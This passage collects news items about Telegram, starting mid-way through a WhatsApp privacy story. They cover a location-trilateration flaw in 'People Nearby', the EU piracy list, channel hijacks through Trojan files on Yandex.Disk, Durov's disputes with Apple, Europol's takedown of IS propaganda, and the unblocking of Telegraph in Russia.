WhatsApp reassured its users that it does not keep logs of who is messaging whom, that it cannot see shared locations, that it does not share contacts with Facebook, and that groups can remain private. It also advises users that they still have the option to set messages to disappear and that they cannot download their data. WhatsApp's clarification may manage to reassure some users that the privacy changes are not as troubling as first feared, but for others it may have come too late.

Researcher Exposes Telegram's Location Bug, Company Says It's a Feature

A researcher who found that the messaging platform Telegram's "People Nearby" feature could reveal users' precise locations has been told that the feature is "working as expected." Users of "People Nearby" can view a list of other Telegram users within a short radius, and can also find local group chats.

Ahmad Hassan used software that let him spoof the location of his Android phone. Using it, he recorded the positions of individuals from three different points and applied trilateration to pinpoint their exact locations. With this method, Hassan could obtain users' accurate locations, including their home addresses, with little effort. Hassan reported the issue hoping for a bug bounty; instead, he was told that Telegram users share their locations intentionally in the "People Nearby" section, and that being able to determine a user's exact location under certain conditions is to be expected.

But Hassan says that when a user enables "People Nearby", they are indirectly posting their residential address online, and many users are unaware of this while using the feature. He also believes there is a wider problem: hackers or users with malicious intent can use fake locations to join local group chats and target members with spam or phishing attacks using malicious links, including fraudulent links and fake Bitcoin investments, which he sees as evidence of the app's poor security. Telegram claims that its platform is "more secure than mass market messengers like WhatsApp and Line."

However, Telegram fails to mention the risks that can arise from malicious users. Other apps have also experienced the location issue recently. The Register reports, "obtaining the location of nearby users is not an issue exclusive to digital devices. A stranger may follow someone home, for example. It is also not so long ago that a huge printed directory of local names, addresses, and telephone numbers used to be delivered to almost every home in many countries – and in the UK BT's online Phone Book service still offers a person search, including address details for those who have not opted out."

The European Commission added VKontakte and Telegram to the list of pirate sites

VKontakte is surprised by the decision of the European Commission to include the social network in the list of resources that contribute to online piracy: the company says it has been interacting with copyright holders for many years and quickly restricts access to disputed content.

The European Commission has published a new list of resources that promote piracy and can benefit from it. The list for the first time included the Telegram messenger and the social network VKontakte.

The list is formed on the basis of reports from groups of right holders. According to the European Commission, Telegram users, including using public channels, "exchange illegal content, in particular music, books, news publications, films and TV programs." In addition, subscribers share links to other sites that host pirated content.

The social network "VKontakte" is also included in the list due to many complaints from copyright holders. Users of the social network can have unauthorized access to books, as well as to movies and TV shows, in particular through the built-in video players.

Both Telegram and VKontakte objected to their inclusion in the "piracy watch list". Telegram told the European Commission that it "does not tolerate any malicious content on its platform" and removes it within 24 hours. VKontakte also noted that it is fighting piracy. In particular, the social network indicated that a copyright holder can complain about copyright infringement through an electronic form. According to VKontakte, its employees processed more than 1.36 million such complaints, most of which ended with the removal of content.

"We are surprised by the inclusion of VKontakte in this list, as for many years we have been actively interacting with copyright holders in various areas," said the press service of the social network.

According to the company, it has signed agreements with the world's largest music copyright holders, including Universal Music, Sony Music, Warner Music, The Orchard, Merlin Network and Believe Digital.

Hackers attacked major Telegram channels via video on Yandex

On November 10, hackers conducted a major attack on popular Telegram channels. The administrators of the Reddit channel, which had 236 thousand subscribers, completely lost access to it. The attackers used an old scheme: they simply sent a Trojan-infected file to the administrators.

Hackers stole the Telegram channel of the Reddit forum, administrators could not log in to the control panel. The Telegram channel Baza was also attacked, but the attackers failed to gain access to the channel.

The hackers had the following scheme: they offered to buy advertising space, but first they asked to watch a video with their materials, which could be downloaded from Yandex.Disk. The document could not be opened on a mobile device, and hackers offered to download it to a desktop computer.

After launching the file, the owner of the Reddit channel with 236 thousand subscribers was no longer able to access it.

Artem Geller, General Director of the Studio.AG lab, explained that this is a very old fraud method and that such files target Windows. Under various pretexts, hackers send material containing malware which, if the victim opens the file, gives access to the entire operating system. In this particular case, the attackers were interested in Telegram, so the Reddit channel's account was stolen.

Yandex.Disk cannot be blamed for missing the Trojan. According to Geller, about 300,000 new viruses appear every day worldwide, so it is simply impossible to catch them all. Moreover, it may not be a new virus but a modification of an old one. At the same time, the Trojan's task is not to destroy the computer system.

Cloud storage is convenient for fraudsters because, unlike email, it lets them upload a file of any size. Unprotected, unencrypted files without passwords are uploaded to such storage.

According to information security expert Alexander Vlasov, one thing must be remembered: those who provide a service for free never commit to protecting your files. Yes, they try to track malware, but only within the general outline of their ecosystem.

Apple denied Durov's statement about the request to block Telegram channels about Belarus

The founder of Telegram, Pavel Durov, accused Apple of trying to "avoid responsibility for complying with its own rules" by using "tricky language". Durov wrote about this in his Telegram channel.

Earlier, Durov said that the corporation had requested the blocking of three channels dedicated to Belarus. These published photos and personal data of security forces and members of election commissions who, according to the authors, committed violations during the elections. The channels had about 100 thousand subscribers in total.

According to Durov, Apple's "trick" lies in the company's claim that it does not require disabling three Belarusian channels that disclose the personal data of security forces involved in suppressing protests. Apple requires not to publish posts that disclose personal information. However, Durov notes, the company does not mention that these channels consist entirely of such posts.

"By hiding its requirements in vague words, Apple is trying to avoid responsibility for complying with its own rules", said the founder of Telegram.

"It's time for Apple to learn to take responsibility for its policies, rather than trying to hide them from users," he added.

According to Durov, he would prefer to keep these channels. The founder of Telegram suggested that they will eventually be blocked on devices using the iOS operating system, but the channels will remain available on other platforms.

According to Apple, the company received complaints from users that their personal data, including names and phone numbers, was transmitted through channels. These complaints were passed to the messenger team, asking them to remove information that reveals someone's personal data on the Internet without their consent, as well as content aimed at specific people.

Telegram did not raise any objections, but promised to check this information and inform Apple about the results of the check.

Earlier, E Hacking News reported that a group of hackers threatens to bring down the tax, energy and banking systems of Belarus if the head of state Alexander Lukashenko does not comply with the ultimatum.

Telegram Takes Down Islamist Propaganda on its Platform, Extremist Groups Struggle

The social networks and the US military have imposed strict controls on Islamist propaganda on social media and have been able to take down the Islamic State terrorist groups' presence there. After this move, experts say these groups are now struggling to regain their foothold on mainstream social media apps and networks. As most of the major social networking sites have choked the group off, the Islamist group has tried to build its propaganda on smaller sites, but even there it has met strong action from the authorities. According to Europol, the EU (European Union) law enforcement agency, social networking companies have tried to bring down the Islamist propaganda content growing on their websites, in an attempt to shut down the extremist group's activities on social media.

Europol, in its report, said, "While Google and Instagram deployed resilience mechanisms across their services, Telegram was the online service provider receiving most of the referral requests during this Action Day. As a result, a significant portion of key actors within the IS network on Telegram were pushed away." These extremist groups used Telegram as their primary platform of propaganda until 2019.

According to Europol, Telegram removed up to 5000 terrorist profiles and bots in two days in an effort to shut down the Islamist propaganda; earlier, it was only able to take down 200-300 accounts on average. After that incident, the extremist groups moved towards more covert apps like the Russian "TamTam" and "Hoop Messenger." Canada hosts these websites. The IS, in apparent desperation, has also started using chat services designed for blockchain developers to spread its messages. In 2016-17, the US Cyber Command took action against these extremist groups, shutting down recruitment groups and suppressing their further attempts to spread messages.

Currently, the US Cyber Command has presidential approval to combat IS propaganda with cyberattacks, and its remit has also widened since then. "In the past year and a half, Telegram has also put forth a considerable effort to root out the abusers of the platform by bolstering its technical capacity in countering malicious content and establishing a close partnership with Europol," says Europol.

Pavel Durov called for Apple to be obliged to allow alternative app stores

Apple should allow users to install apps not only from its own App Store. This opinion was expressed by Telegram founder Pavel Durov. According to him, Tim Cook (CEO of Apple) should be obliged to do this at the legislative level.

The day before, senior Telegram manager Ilya Perekopsky, Vice President of the company founded by Pavel Durov, spoke at a panel discussion with Russian Prime Minister Mikhail Mishustin and representatives of the IT industry in Innopolis. He said that Apple and Google are holding back the development of startups by charging app developers a 30 percent commission, which he likened to a tax. Almost simultaneously with Perekopsky's speech, Durov published an article in which he called for Apple to be legally obliged to allow an alternative app store on the iPhone.

Durov is sure that if this is not done, app developers, in particular those from Russia, will be forced to sell their startups for little money, while Apple's capitalization will only grow.

"Preventing two supranational corporations from collecting taxes from all of humanity is not an easy task. Corporations employ thousands of lobbyists, lawyers, and PR agents, and their budgets are unlimited. At the same time, app developers are scattered and scared, as the fate of their projects depends entirely on the favor of Apple and Google," wrote Pavel Durov.

The head of the TelecomDaily information and analytical agency Denis Kuskov noted that changing the market is quite difficult because these two companies are leading it. Therefore, Durov needs to accept this fact.

Durov recalled that in 2016 Apple banned the Telegram team from launching its own gaming platform: "We had to remove the Telegram games catalog that we had already created and almost the entire platform interface, otherwise Apple threatened to remove Telegram from the App Store." According to Durov, the iPhone manufacturer treats many other developers the same way.

Telegraph service unblocked in Russia

Russia stopped blocking the popular Telegram messenger almost a month ago. However, the related Telegraph service remained blocked. Now Russia has also unblocked the Telegraph platform for creating and publishing articles.

The Telegraph platform was launched by the Telegram team in November 2016. It is designed to quickly create and publish articles, notes, and other similar content, a link to which can then be easily shared. Registration is not required for publication.

The blocking of the Telegra[.]ph service in Russia began at the end of 2018, a little later than the Telegram messenger.

According to Roskomsvoboda, a resource that closely monitors the registry of blocked sites, all pages on the Telegra.ph domain that had been blocked in Russia by the decision of a particular authority are now excluded from the blocking registry. The last two such pages were removed from the blacklist only on July 11.

It is interesting to note that, according to Dmitry Peskov, Press Secretary of the President of Russia, the lifting of restrictions on access to the Telegram messenger in Russia is viewed positively in the Kremlin, as it is in line with President Vladimir Putin's course of developing the high-tech industry.

The Press Secretary of the Head of State also noted as a positive fact the participation of the heads of the company that owns the messenger in government events on the development of the IT industry.

Recall that Telegram had been blocked in Russia since April 2018 for non-compliance with the requirement to provide encryption keys, but during the coronavirus pandemic the government began to use the messenger to distribute official information. In this regard, the State Duma even introduced a bill to unblock Telegram. On June 18, Roskomnadzor decided to lift the restrictions on access to the messenger, and its creator, Pavel Durov, congratulated the Russians on the event.